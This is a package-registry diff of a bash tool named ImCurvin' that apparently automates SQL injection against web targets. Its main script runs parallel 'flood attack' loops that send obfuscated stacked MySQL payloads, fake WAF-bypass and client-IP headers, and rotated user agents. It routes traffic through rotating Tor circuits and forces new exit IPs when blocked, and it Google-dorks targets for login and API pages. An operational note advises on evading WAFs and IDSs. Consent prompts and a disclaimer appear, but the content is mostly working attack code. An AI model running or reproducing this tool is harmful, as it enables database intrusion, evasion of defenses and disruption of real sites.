imcurvin 1.1.8__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (37) hide show
  1. imcurvin-1.1.8/Imcurvin/Defiancescan.sh +381 -0
  2. imcurvin-1.1.8/Imcurvin/Note.txt +40 -0
  3. imcurvin-1.1.8/Imcurvin/Warning.txt +38 -0
  4. imcurvin-1.1.8/Imcurvin/__init__.py +0 -0
  5. imcurvin-1.1.8/Imcurvin/cli.py +21 -0
  6. imcurvin-1.1.8/Imcurvin/default_scan.sh +52 -0
  7. imcurvin-1.1.8/Imcurvin/imcurvin.sh +191 -0
  8. imcurvin-1.1.8/Imcurvin/risk_scan.sh +259 -0
  9. imcurvin-1.1.8/LICENSE +201 -0
  10. imcurvin-1.1.8/PKG-INFO +58 -0
  11. imcurvin-1.1.8/README.md +68 -0
  12. imcurvin-1.1.8/data/HAHA.txt +40 -0
  13. imcurvin-1.1.8/data/HAHAnonphp.txt +40 -0
  14. imcurvin-1.1.8/data/TODO.txt +2 -0
  15. imcurvin-1.1.8/data/__init__.py +0 -0
  16. imcurvin-1.1.8/data/gentle.txt +20 -0
  17. imcurvin-1.1.8/data/nerfdef.txt +40 -0
  18. imcurvin-1.1.8/data/nonnerfphp.txt +40 -0
  19. imcurvin-1.1.8/data/nonphp.txt +40 -0
  20. imcurvin-1.1.8/data/sqli.txt +20 -0
  21. imcurvin-1.1.8/data/sqli_defiance.txt +40 -0
  22. imcurvin-1.1.8/data/target_default.txt +30 -0
  23. imcurvin-1.1.8/data/targets.txt +40 -0
  24. imcurvin-1.1.8/imcurvin.egg-info/PKG-INFO +58 -0
  25. imcurvin-1.1.8/imcurvin.egg-info/SOURCES.txt +35 -0
  26. imcurvin-1.1.8/imcurvin.egg-info/dependency_links.txt +1 -0
  27. imcurvin-1.1.8/imcurvin.egg-info/entry_points.txt +2 -0
  28. imcurvin-1.1.8/imcurvin.egg-info/not-zip-safe +1 -0
  29. imcurvin-1.1.8/imcurvin.egg-info/top_level.txt +4 -0
  30. imcurvin-1.1.8/setup.cfg +4 -0
  31. imcurvin-1.1.8/setup.py +68 -0
  32. imcurvin-1.1.8/tamper/__init__.py +0 -0
  33. imcurvin-1.1.8/tamper/hungry.sh +121 -0
  34. imcurvin-1.1.8/validators/__init__.py +1 -0
  35. imcurvin-1.1.8/validators/ayam.py +21 -0
  36. imcurvin-1.1.8/validators/defval.py +61 -0
  37. imcurvin-1.1.8/validators/validate.py +82 -0
@@ -0,0 +1,381 @@
1
+ #!/bin/bash
2
+ # ImCurvin' v1.2.0
3
+ # Copyright 2026 Skokoo
4
+ # Licensed under the Apache License, Version 2.0
5
+ # WIP
6
+ target_url="$1"
7
+ export DEFIANCE_DIR="$(cd "$(dirname "${BASH_SOURCE}")" && pwd)"
8
+ export ROOT_LOG_FILE="$DEFIANCE_DIR/../targetDef.log"
9
+
10
+ source "$DEFIANCE_DIR/../tamper/hungry.sh"
11
+ # Killing all process related to this thing, since there's 2 vector. No no manual CTRL C.
12
+ eexit() {
13
+ trap - SIGINT SIGTERM EXIT
14
+ echo -e "\n\n\e[0;31m[\e[0m!\e[0;31m]\e[0m Interrupted, process killed. "
15
+ kill -9 -$$ 2>/dev/null
16
+ }
17
+ trap 'eexit' SIGINT
18
+
19
+ if [ -n "$custom_proxy" ]; then
20
+ export TOR_CIRCUITS=("$custom_proxy")
21
+ else
22
+ export TOR_CIRCUITS=(9050 9052 9054 9056 9058 9060)
23
+ fi
24
+ # Random agent Array here.
25
+ export DEFIANCE_UA=(
26
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
27
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
28
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
29
+ "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36"
30
+ "Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/605.1.15"
31
+ "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
32
+ )
33
+ # logo
34
+ print_defiance_logo() {
35
+ echo -e " \e[38;5;18m▄\e[0m"
36
+ echo -e " \e[38;5;18m▄██\e[0m"
37
+ echo -e " \e[38;5;18m▄██\e[38;5;21m█▀\e[0m"
38
+ echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m█▀\e[0m"
39
+ echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m█▀\e[0m"
40
+ echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m▄██\e[38;5;45m█▀\e[0m"
41
+ echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m▄██\e[38;5;45m▄██\e[38;5;51m█▀\e[0m"
42
+ echo -e " \e[38;5;18m▄██\e[38;5;21m▄██\e[38;5;27m▄██\e[38;5;39m▄██\e[38;5;45m▄██\e[38;5;51m▄██\e[38;5;15m██\e[0m"
43
+ echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m▀██\e[38;5;45m▀██\e[38;5;51m▀██\e[38;5;15m██\e[0m"
44
+ echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m▀██\e[38;5;45m▀██\e[38;5;51m█▄\e[0m"
45
+ echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m▀██\e[38;5;45m█▄\e[0m"
46
+ echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m▀██\e[38;5;39m█▄\e[0m"
47
+ echo -e " \e[38;5;18m▀██\e[38;5;21m▀██\e[38;5;27m█▄\e[0m"
48
+ echo -e " \e[38;5;18m▀██\e[38;5;21m█▄\e[0m"
49
+ echo -e " \e[38;5;18m▀██\e[0m"
50
+ echo -e " \e[38;5;18m▀\e[0m"
51
+ echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m Defiance mode activated, ImCurlin no longer friendly ;("
52
+ if [ -n "$custom_proxy" ]; then
53
+ echo -e "\e[0;31m[\e[0m!\e[0;37m]\e[0m Routing via $custom_proxy"
54
+ else
55
+ echo -e "\e[0;31m[\e[0m!\e[0;37m]\e[0m MultiCircuit Rotation Enabled. IPs are shifting dynamically per request.!"
56
+ fi
57
+ }
58
+ # HTTP pollution, air pollution.
59
+ # Told waf that this is JSON lol.
60
+ braindamage() {
61
+ local choice=$((RANDOM % 3))
62
+ local cf_ray=$(cat /dev/urandom | tr -dc 'a-f0-9' | fold -w 16 | head -n 1)
63
+ if [[ "$target_url" == *"?"* ]]; then
64
+ case "$choice" in
65
+ 0) echo "-H Content-Type:application/json -H X-Forwarded-For:127.0.0.1 -H CF-Connecting-IP:172.67.$((RANDOM % 254 + 1)).$((RANDOM % 254 + 1)) -H CF-RAY:${cf_ray}-CGK" ;;
66
+ 1) echo "-H Content-Type:application/json -H CF-Visitor:{\"scheme\":\"https\"}" ;;
67
+ 2) echo "-H Content-Type:application/json -H X-WAF-Bypass:True -H CF-IPCountry:US -H True-Client-IP:103.21.244.$((RANDOM % 254 + 1))" ;;
68
+
69
+ esac
70
+ else
71
+ case "$choice" in
72
+ 0) echo "-H Content-Type:application/json -H Authorization:Bearer $cf_ray -H X-WAF-Bypass:True -H CF-IPCountry:US" ;;
73
+ 1) echo "-H Content-Type:application/json -H X-Requested-With:XMLHttpRequest -H CF-RAY:${cf_ray}-CGK -H True-Client-IP:103.21.244.$((RANDOM % 254 + 1))" ;;
74
+ 2) echo "-H Content-Type:application/json -H Cache-Control:no-cache,no-store -H Pragma:no-cache -H X-Forwarded-For:127.0.0.1" ;;
75
+ esac
76
+ fi
77
+ }
78
+ # dork, goofle dorking. I mean google.
79
+ dork() {
80
+ local dom="$1"
81
+ echo -e "[i] Launching Universal Google Dorking..."
82
+ sleep 2
83
+
84
+ local gerbang=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
85
+ if [ -n "$custom_proxy" ]; then local prx="-x $gerbang"; else local prx="--socks5-hostname 127.0.0.1:$gerbang"; fi
86
+ local samaran=${DEFIANCE_UA[$RANDOM % ${#DEFIANCE_UA[@]}]}
87
+ # fork, i mean dork. Search search lofin, i mena login. *mean.
88
+ local q="site:${dom} (intitle:\"login\" inurl:\"login\") OR inurl:search OR inurl:api OR inurl:v1"
89
+ local enc=$(echo -n "$q" | curl -s -o /dev/null -w "%{url_effective}" "http://127.0.0.1" --get --data-urlencode "q=" | cut -d'=' -f2-)
90
+ local raw=$(curl $prx -s -m 10 -A "$samaran" "https://google.com/search?q=${enc}&gbv=1")
91
+
92
+ local -a list
93
+ while read -r line; do
94
+ [[ -n "$line" ]] && list+=("$line")
95
+ done < <(echo "$raw" | grep -oP '(?<=url\?q=)[^&]*' | grep "$dom" | sort -u | head -n 4)
96
+
97
+ if [ ${#list[@]} -eq 0 ]; then
98
+ echo -e "\e[0;33m[-]\e[0m No links found on Google Index."
99
+ return 1
100
+ fi
101
+
102
+ echo -e "\n\e[0;32m[+]\e[0m Top 4 Discovered Targets:"
103
+ for i in "${!list[@]}"; do
104
+ echo -e "[\e[1;34m$((i+1))\e[0m] ${list[$i]}"
105
+ done
106
+
107
+ echo -n -e "\n\e[0;32m[?]\e[0m Select target (1-4) or 's' to skip: "
108
+ read -r -n 1 sel
109
+ echo ""
110
+
111
+ if [[ "$sel" =~ ^[1-4]$ ]]; then
112
+ local idx=$((sel - 1))
113
+ export target_url="${list[$idx]}"
114
+ echo -e "\e[0;32m[+]\e[0m Locked on: \e[1;34m$target_url\e[0m"
115
+ return 0
116
+ else
117
+ echo -e "[i] Proceeding with default input."
118
+ return 2
119
+ fi
120
+ }
121
+ # 1st Vector func.
122
+ vector_sqli_agressor_left() {
123
+ while IFS='|' read -r default_path query_payload || [ -n "$query_payload" ]; do
124
+ [[ -z "$default_path" ]] && continue
125
+
126
+ local random_port=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
127
+ local proxy_flag=""
128
+ if [ -n "$custom_proxy" ]; then
129
+ proxy_flag="-x $random_port --fail"
130
+ else
131
+ proxy_flag="--socks5-hostname 127.0.0.1:$random_port --socks5-gssapi-nec --fail"
132
+ fi
133
+
134
+ local base_ua="${DEFIANCE_UA[$RANDOM % ${#DEFIANCE_UA[@]}]}"
135
+ local random_ua="$base_ua"
136
+ local ua_salt=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)
137
+
138
+ random_ua="${base_ua} Chrome/$((RANDOM % 10 + 120)).0.$((RANDOM % 999 + 1000)).$((RANDOM % 99)) Safari/537.36 Build/${ua_salt}"
139
+
140
+ local defiance_tamper_path=""
141
+ local final_query=""
142
+ local raw_payload="$query_payload"
143
+ local t2=$(randomcase_engine "$raw_payload")
144
+ local t4=$(space2comment_engine "$t2")
145
+ local hex_xor=$(xor_engine "$t4")
146
+ local b64_payload=$(base64_engine "$hex_xor")
147
+ defiance_tamper_path="'; SET @s=FROM_BASE64('${b64_payload}'); PREPARE stmt FROM @s; EXECUTE stmt;--"
148
+
149
+
150
+ if [[ "$WORDLIST_MYSQL" == *"nonphp"* || "$WORDLIST_MYSQL" == *"HAHA"* ]]; then
151
+ final_query="${default_path}${defiance_tamper_path}"
152
+ else
153
+ if [[ "$defiance_tamper_path" == *"="* ]]; then
154
+ local param_name=$(echo "$defiance_tamper_path" | cut -d'=' -f1)
155
+ local param_val=$(echo "$defiance_tamper_path" | cut -d'=' -f2-)
156
+ final_query="${default_path}${param_name}=999&${param_name}=${param_val}${query_payload}"
157
+ else
158
+ final_query="${default_path}${defiance_tamper_path}"
159
+ fi
160
+ fi
161
+
162
+ local waf_trick=$(braindamage)
163
+ echo -e "\e[0;33m[\e[0m!\e[0;34m+]\e[0m Vector 1 [Port:$random_port] Probing Latency on: \e[38;5;236m${target_url}${final_query}\e[0m"
164
+ local curl_output=$(curl $proxy_flag $waf_trick -m 12 -A "$random_ua" -s -o /dev/null -w "%{time_total}|%{http_code}" "${target_url}${final_query}")
165
+ local stopwatch=$(echo "$curl_output" | cut -d'|' -f1)
166
+ local http_status=$(echo "$curl_output" | cut -d'|' -f2)
167
+
168
+ if [[ "$http_status" == "403" || "$http_status" == "429" ]]; then
169
+ echo -e " \e[0;33m[!]\e[0m Port $random_port Shadowbanned (HTTP $http_status). Rotating TOR IP Circuit..."
170
+ (echo "AUTHENTICATE \"\""; echo "SIGNAL NEWNYM"; echo "QUIT") | nc 127.0.0.1 9051 >/dev/null 2>&1
171
+ sleep 1
172
+ fi
173
+
174
+ if [[ -n "$stopwatch" && "$stopwatch" != "0.000000" ]]; then
175
+ if (( $(echo "$stopwatch > 4.0" | bc -l) )); then
176
+ echo -e "\e[0;31m[!+!]\e[0m Vector 1 confirmed MySQL Anomaly: ${stopwatch}s"
177
+ echo "SQLI_ALERT|$default_path|$query_payload" >> "$ROOT_LOG_FILE"
178
+ fi
179
+ fi
180
+
181
+ sleep $((RANDOM % 6 + 4))
182
+ done < <(shuf "$WORDLIST_MYSQL")
183
+ }
184
+ vector_sqli_agressor_right() {
185
+ while IFS='|' read -r default_path query_payload || [ -n "$query_payload" ]; do
186
+ [[ -z "$default_path" ]] && continue
187
+
188
+ local random_port=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
189
+ local proxy_flag=""
190
+ if [ -n "$custom_proxy" ]; then
191
+ proxy_flag="-x $random_port --fail"
192
+ else
193
+ proxy_flag="--socks5-hostname 127.0.0.1:$random_port --socks5-gssapi-nec --fail"
194
+ fi
195
+
196
+ local base_ua="${DEFIANCE_UA[$RANDOM % ${#DEFIANCE_UA[@]}]}"
197
+ local random_ua="$base_ua"
198
+ local ua_salt=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)
199
+
200
+ random_ua="${base_ua} Chrome/$((RANDOM % 10 + 120)).0.$((RANDOM % 999 + 1000)).$((RANDOM % 99)) Safari/537.36 Build/${ua_salt}"
201
+
202
+ local defiance_tamper_path=""
203
+ local final_query=""
204
+ local raw_payload="$query_payload"
205
+ local t2=$(randomcase_engine "$raw_payload")
206
+ local t4=$(space2comment_engine "$t2")
207
+ local hex_xor=$(xor_engine "$t4")
208
+ local b64_payload=$(base64_engine "$hex_xor")
209
+ defiance_tamper_path="'; SET @s=FROM_BASE64('${b64_payload}'); PREPARE stmt FROM @s; EXECUTE stmt;--"
210
+
211
+ if [[ "$WORDLIST_MYSQL" == *"nonphp"* || "$WORDLIST_MYSQL" == *"HAHA"* ]]; then
212
+ final_query="${default_path}${defiance_tamper_path}"
213
+ else
214
+ if [[ "$defiance_tamper_path" == *"="* ]]; then
215
+ local param_name=$(echo "$defiance_tamper_path" | cut -d'=' -f1)
216
+ local param_val=$(echo "$defiance_tamper_path" | cut -d'=' -f2-)
217
+ final_query="${default_path}${param_name}=999&${param_name}=${param_val}${query_payload}"
218
+ else
219
+ final_query="${default_path}${defiance_tamper_path}"
220
+ fi
221
+ fi
222
+ local waf_trick=$(braindamage)
223
+
224
+ echo -e "\e[0;33m[\e[0m!\e[0;34m+]\e[0m Vector 2 [Port:$random_port] Probing Latency on: \e[38;5;236m${target_url}${final_query}\e[0m"
225
+
226
+ local curl_output=$(curl $proxy_flag $waf_trick -m 12 -A "$random_ua" -s -o /dev/null -w "%{time_total}|%{http_code}" "${target_url}${final_query}")
227
+
228
+ local stopwatch=$(echo "$curl_output" | cut -d'|' -f1)
229
+ local http_status=$(echo "$curl_output" | cut -d'|' -f2)
230
+
231
+ if [[ "$http_status" == "403" || "$http_status" == "429" ]]; then
232
+ echo -e " \e[0;33m[!]\e[0m Port $random_port Shadowbanned (HTTP $http_status). Rotating TOR IP Circuit..."
233
+ (echo "AUTHENTICATE \"\""; echo "SIGNAL NEWNYM"; echo "QUIT") | nc 127.0.0.1 9051 >/dev/null 2>&1
234
+ sleep 1
235
+ fi
236
+
237
+ if [[ -n "$stopwatch" && "$stopwatch" != "0.000000" ]]; then
238
+ if (( $(echo "$stopwatch > 4.0" | bc -l) )); then
239
+ echo -e "\e[0;31m[!+!]\e[0m Vector 2 confirmed MySQL Anomaly: ${stopwatch}s"
240
+ echo "SQLI_ALERT|$default_path|$query_payload" >> "$ROOT_LOG_FILE"
241
+ fi
242
+ fi
243
+
244
+ sleep $((RANDOM % 6 + 4))
245
+ done < <(shuf "$WORDLIST_MYSQL")
246
+ }
247
+
248
+ clear
249
+ print_defiance_logo
250
+ echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m \e[1;31mLEGAL WARNING 1/2:\e[0m Defiance Mode fires a multivector parallel network flood."
251
+ echo -e "Executing this mode against unauthorized infrastructures strictly violates cyber laws."
252
+ echo -n -e "\e[0;33m[\e[0m?\e[0;37m]\e[0m Do you have explicit written consent from the target owner? (YES/no): "
253
+ read -r legal_1
254
+
255
+ if [ "$legal_1" != "YES" ]; then
256
+ echo -e "\n\e[0;31m[\e[0m-\e[0;37m]\e[0m Aborted. Unauthorized scanning is strictly illegal."
257
+ exit 1
258
+ fi
259
+
260
+ echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m \e[1;31mLEGAL WARNING 2/2:\e[0m This tool is NOT server friendly in Defiance Mode."
261
+ echo -e "This action will trigger heavy CPU calculation loads and dynamic Multi IP routing on the target."
262
+ echo -n -e "\e[0;33m[\e[0m?\e[0;37m]\e[0m Type \e[1;33m'I ACCEPT ALL RISKS'\e[0m to proceed with the execution sequence: "
263
+ read -r legal_2
264
+
265
+ if [ "$legal_2" != "I ACCEPT ALL RISKS" ]; then
266
+ echo -e "\n\e[0;31m[\e[0m-\e[0;37m]\e[0m Verification failed. Revert. Operation canceled."
267
+ exit 1
268
+ fi
269
+ if ! command -v xxd &> /dev/null; then
270
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m WARNING: 'xxd' is not installed on your terminal."
271
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Please install xxd first before running imCurvin'."
272
+ exit 1
273
+ fi
274
+ if [ -z "$custom_proxy" ]; then
275
+ echo -e "\n\e[0;33m[\e[0m!\e[0;37m]\e[0m Checking for TOR terminal service..."
276
+
277
+ if pgrep -x "tor" >/dev/null 2>&1; then
278
+
279
+ echo -e "\e[0;32m[\e[0m=\e[0;32m]\e[0m Tor terminal service detected as active."
280
+ else
281
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m WARNING: Tor terminal service is not detected/running."
282
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Run 'tor' command in a new terminal before using Defiance Mode."
283
+
284
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Operation aborted due to environment mismatch."
285
+ exit 1
286
+ fi
287
+ fi
288
+
289
+ echo -e "\n\e[0;34m[\e[0m*\e[0;37m]\e[0m Tracing target redirections."
290
+
291
+ recon_port=${TOR_CIRCUITS[$RANDOM % ${#TOR_CIRCUITS[@]}]}
292
+
293
+ if [ -n "$custom_proxy" ]; then
294
+ recon_proxy="-x $recon_port";
295
+ else
296
+
297
+ recon_proxy="--socks5-hostname 127.0.0.1:$recon_port";
298
+ fi
299
+
300
+ final_destination_url=$(curl $recon_proxy -s -o /dev/null -w "%{url_effective}" -L "$target_url")
301
+
302
+ export target_url="$final_destination_url"
303
+
304
+ clean_domain=$(echo "$target_url" | sed -e 's|^[^/]*//||' -e 's|/.*||' -e 's|:.*||')
305
+ dork "$clean_domain"
306
+ dork_status=$?
307
+
308
+ if [ -f "$DEFIANCE_DIR/../validators/ayam.py" ]; then
309
+
310
+ echo -e "\n[i] Analyzing paramater.."
311
+ eye_report=$(python "$DEFIANCE_DIR/../validators/ayam.py" "$target_url")
312
+
313
+ param_type=$(echo "$eye_report" | cut -d'|' -f1)
314
+
315
+ if [ "$param_type" = "QUERY_PARAM" ]; then
316
+
317
+ discovered_keys=$(echo "$eye_report" | cut -d'|' -f3)
318
+ echo -e "\e[0;32m[+]\e[0m Active Query Parameters Spotted > ($discovered_keys)"
319
+
320
+ elif [ "$param_type" = "PATH_PARAM" ]; then
321
+
322
+ echo -e "\e[0;32m[+]\e[0m Path/Folder Parameter Spotted."
323
+ else
324
+ echo -e "\e[0;33m[-]\e[0m ayam.py: No parameters detected in the final URL destination."
325
+ fi
326
+ fi
327
+ if [ -n "$custom_wordlist" ] && [ -f "$custom_wordlist" ]; then
328
+ export WORDLIST_MYSQL="$custom_wordlist"
329
+ else
330
+ if [[ "$target_url" != *"?"* ]]; then
331
+ echo -e "\e[0;32m[+]\e[0m Framework Targeting: NonPHP."
332
+ export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/HAHAnonphp.txt"
333
+ else
334
+ echo -e "\e[0;32m[+]\e[0m Targeting: Standard PHP / Query Configuration Engaged."
335
+ export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/HAHA.txt"
336
+ fi
337
+ if [ "$nerf_mode" = "true" ]; then
338
+ if [[ "$target_url" != *"?"* ]]; then
339
+ export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/nonnerfphp.txt"
340
+ else
341
+ export WORDLIST_MYSQL="$DEFIANCE_DIR/../data/nerfdef.txt"
342
+ fi
343
+ fi
344
+ fi
345
+ echo -e "\n\e[0;34m[\e[0m*\e[0;37m]\e[0m Performing database environment verification.."
346
+
347
+ server_fingerprint=$(curl $recon_proxy -m 5 -s -I "$target_url" | grep -Ei "(Server|X-Powered-By|Set-Cookie|X-DDoS|WAF)")
348
+
349
+ if echo "$server_fingerprint" | grep -qEi "(oracle|postgre|mssql|microsoft-iis|supabase)"; then
350
+ echo -e "\n\e[0;31m[\e[0m!\e[0;37m]\e[0m Target rejected, Non MySQL environment fingerprint."
351
+
352
+ echo -e "[i] Footprint: $(echo "$server_fingerprint" | tr '\r\n' ' ')"
353
+
354
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m Revert. Operation aborted to prevent structural asset wastage."
355
+ exit 1
356
+
357
+ else
358
+
359
+ echo -e "\e[0;32m[\e[0m+\e[0;37m]\e[0m Target environment matches MySQL compliance directives."
360
+ fi
361
+ sleep 1
362
+
363
+ echo -e "\n\e[0;34m[\e[0mi\e[0;37m]\e[0m Launching dualvector synchronized flood attack against \e[1;34m$target_url\e[0m...\n"
364
+
365
+ vector_sqli_agressor_left &
366
+ pid_vector1=$!
367
+
368
+ vector_sqli_agressor_right &
369
+ pid_vector2=$!
370
+
371
+ wait $pid_vector1 $pid_vector2
372
+
373
+ echo -e "\n\e[0;32m[\e[0m=\e[0;32m]\e[0m Attack sequence completed. Input to Defiance Log Analyst.."
374
+ sleep 1
375
+ if [ -f "$DEFIANCE_DIR/../validators/defval.py" ]; then
376
+ python "$DEFIANCE_DIR/../validators/defval.py"
377
+ else
378
+ echo -e "\e[0;33m[\e[0m-\e[0;37m]\e[0m validators/defval.py not found. Skipping validate."
379
+ fi
380
+
381
+ echo ""
@@ -0,0 +1,40 @@
1
+ NOTE:
2
+
3
+ 1. OPERATIONAL NOTE
4
+ Do not be overly ambitious when running this tool.
5
+
6
+ Even though it is equipped with "randomized" User Agents and
7
+ dynamic delay entropy, advanced NextGen WAF's and modern IDSs can still
8
+ detect behavioral anomalies if you are not careful.
9
+
10
+ Please note that in "Risk" Mode, although you are strictly required
11
+ to route your traffic through the TOR SOCKS5 proxy network (or specify your own interface using the -proxy flag), this
12
+ operational setup does not fully eliminate the possibility of your
13
+ connection or exit nodes being actively blocked by good WAF.
14
+
15
+ Operational Safety Rules:
16
+ - Never reduce the built in delay settings.
17
+ - Treat this audit as a tactical puzzle, not a "brute force" race.
18
+ - If your connection drops unexpectedly, your IP has likely been banned.
19
+ Rotate your network interface immediately.
20
+
21
+ 2. SYSTEM REQUIREMENTS
22
+ To ensure the script executes flawlessly without throwing runtime errors,
23
+ the user must provide the following baseline environment:
24
+
25
+ - OS: Any operating system with a Linux terminal environment.
26
+ - Network Tool: curl.
27
+ - Proxy Client: tor (Mandatory if you intend to execute "Risk" Mode)
28
+ - Other: Python (Mandatory if you want to validate false positives)
29
+ - Other: coreutils (For shuf)
30
+ - Other: xxd
31
+
32
+ ->>
33
+ Copyright 2026 Skokoo
34
+
35
+ Licensed under the Apache License, Version 2.0 (the "License");
36
+ you may not use this file except in compliance with the License.
37
+ You may obtain a copy of the License at
38
+
39
+ http://www.apache.org/licenses/LICENSE-2.0
40
+ ->>
@@ -0,0 +1,38 @@
1
+ READ THIS BEFORE USE IMCURVIN'
2
+
3
+ 1. TERMS OF OPERATION
4
+ The User is strictly authorized to execute this tool ONLY against
5
+ domains, networks, or infrastructures that meet the following criteria:
6
+
7
+ a. The infrastructure is entirely owned and operated by the User,
8
+ intended solely for personal security testing and evaluation.
9
+ b. The User has obtained explicit, written, and legally binding
10
+ authorization from the target infrastructure owners.
11
+
12
+ 2. LIABILITY DISCLAIMER
13
+ Performing security audits or scanning unauthorized targets is strictly
14
+ illegal and constitutes a violation of cyber security regulations.
15
+
16
+ The developer of ImCurvin' assumes absolutely no liability and is not
17
+ responsible for any misuse, data disruption, legal consequences, or
18
+ damages caused by the User's unauthorized or malicious actions.
19
+
20
+ 3. ETHICAL ENGAGEMENT
21
+ Users are expected to demonstrate professionalism and integrity.
22
+ Always verify that your target environment is properly whitelisted
23
+ and scoped before initiating any execution sequence.
24
+
25
+ Always be a good person and choose your target wisely. Do not cause
26
+ trouble if you do not want trouble caused to you.
27
+
28
+ ->>
29
+
30
+ Copyright 2026 Skokoo.
31
+
32
+ Licensed under the Apache License, Version 2.0 (the "LICENSE");
33
+ you may not use this file except in compliance with the License.
34
+ You may obtain a copy of the License at
35
+
36
+ http://apache.org
37
+
38
+ ->>
File without changes
@@ -0,0 +1,21 @@
1
+ import os
2
+ import subprocess
3
+ import sys
4
+
5
+ def main():
6
+ current_dir = os.path.dirname(os.path.abspath(__file__))
7
+ script_path = os.path.join(current_dir, 'imcurvin.sh')
8
+ if not os.path.exists(script_path):
9
+ parent_dir = os.path.dirname(current_dir)
10
+ script_path = os.path.join(parent_dir, 'Imcurvin', 'imcurvin.sh')
11
+ if os.path.exists(script_path):
12
+ try:
13
+ os.chmod(script_path, 0o755)
14
+ except Exception:
15
+ pass
16
+ try:
17
+ subprocess.run(['bash', script_path] + sys.argv[1:], check=True)
18
+ except subprocess.CalledProcessError as e:
19
+ sys.exit(e.returncode)
20
+ except KeyboardInterrupt:
21
+ sys.exit(130)
@@ -0,0 +1,52 @@
1
+ # ImCurvin' v1.2.0
2
+ # Copyright 2026 Skokoo
3
+ # Licensed under the Apache License, Version 2.0
4
+ # Code version 3.2
5
+
6
+ # I just googled germany food. ah yes, germany food...
7
+ if [ -n "$custom_wordlist" ]; then
8
+ if [ ! -f "$custom_wordlist" ]; then
9
+ echo "[!] Custom Wordlist not found."
10
+ exit 1
11
+ fi
12
+ sauerkraut="$custom_wordlist"
13
+ else
14
+ sauerkraut="$(dirname "$0")/../data/target_default.txt"
15
+ fi
16
+ #dir = dear right? Dear name?
17
+ schnitzel=0
18
+ # i hate creating more files, so array.
19
+ pretzel=(
20
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
21
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
22
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
23
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
24
+ "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36"
25
+ "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/605.1.15"
26
+ "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
27
+ )
28
+ echo -e "\e[0;34m[\e[0m+\e[0;34m]\e[0m Starting standard scanning..\n"
29
+ # loop, loop. If loop = loop do loop. If loop ≠ loop dont loop ok?
30
+ while IFS= read -r kartoffelsalat || [ -n "$kartoffelsalat" ]; do
31
+ [[ -z "$kartoffelsalat" || "$kartoffelsalat" =~ ^# ]] && continue
32
+ #sike
33
+ spatzle="$target_url/$kartoffelsalat"
34
+ strudel=${pretzel[$RANDOM % ${#pretzel[@]}]}
35
+
36
+ echo -e "\e[0;34m[\e[0m+\e[0;34m]\e[0m Scanning $spatzle"
37
+ proxy_flag=""
38
+ if [ -n "$custom_proxy" ]; then
39
+ proxy_flag="-x $custom_proxy"
40
+ fi
41
+ curl $proxy_flag -m 3 -A "$strudel" -H "X-Forwarded-For: 127.0.0.1" -Iv "$spatzle" --stderr - | grep "< HTTP"
42
+
43
+ schnitzel=$((schnitzel + 1))
44
+
45
